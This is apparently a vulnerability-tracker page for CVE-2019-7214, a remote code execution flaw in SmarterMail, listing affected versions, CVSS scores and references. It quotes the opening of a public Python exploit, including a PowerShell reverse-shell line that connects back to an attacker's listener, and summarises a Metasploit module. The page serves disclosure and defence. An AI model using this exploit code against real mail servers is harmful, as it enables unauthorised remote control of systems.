CVE-2019-7214
published 2019-04-24CVE-2019-7214: SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when…
PriorityP183critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
83.32%
99.6th percentile
SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| smartertools | smartermail | >= 16.0.6345 < 16.3.6985 | 16.3.6985 |
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
SmarterMail Build 6985 - Remote Code Execution
exploitdb·2020-12-09·CVSS 9.8
CVE-2019-7214 [CRITICAL] SmarterMail Build 6985 - Remote Code Execution
SmarterMail Build 6985 - Remote Code Execution
---
# Exploit Title: SmarterMail Build 6985 - Remote Code Execution
# Exploit Author: 1F98D
# Original Author: Soroush Dalili
# Date: 10 May 2020
# Vendor Hompage: re
# CVE: CVE-2019-7214
# Tested on: Windows 10 x64
# References:
# https://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/
#
# SmarterMail before build 6985 provides a .NET remoting endpoint
# which is vulnerable to a .NET deserialisation attack.
#
#!/usr/bin/python3
import base64
import socket
import sys
from struct import pack
HOST='192.168.1.1'
PORT=17001
LHOST='192.168.1.2'
LPORT=4444
psh_shell = '$client = New-Object System.Net.Sockets.TCPClient("'+LHOST+'",'+str(LPORT)+');$stream = $client.GetStream();[byte[]]$bytes = 0..655
Metasploit
SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
metasploit·CVSS 9.8
[CRITICAL] SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
This module exploits a vulnerability in the SmarterTools SmarterMail software for version numbers <= 16.x or for build numbers < 6985. The vulnerable versions and builds expose three .NET remoting endpoints on port 17001, namely /Servers, /Mail and /Spool. For example, a typical installation of SmarterMail Build 6970 will have the /Servers endpoint exposed to the public at tcp://0.0.0.0:17001/Servers, where serialized .NET commands can be sent through a TCP socket connection. The three endpoints perform deserialization of untrusted data (CVE-2019-7214), allowing an attacker to send arbitrary commands to be deserialized and executed. This module exploits this vulnerability to perform .NET deserializa
No writeups or analysis indexed.
http://packetstormsecurity.com/files/160416/SmarterMail-6985-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/173388/SmarterTools-SmarterMail-Remote-Code-Execution.htmlhttps://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/https://www.smartertools.com/smartermail/release-notes/currenthttp://packetstormsecurity.com/files/160416/SmarterMail-6985-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/173388/SmarterTools-SmarterMail-Remote-Code-Execution.htmlhttps://www.nccgroup.trust/uk/our-research/technical-advisory-multiple-vulnerabilities-in-smartermail/https://www.smartertools.com/smartermail/release-notes/current
2019-04-24
Published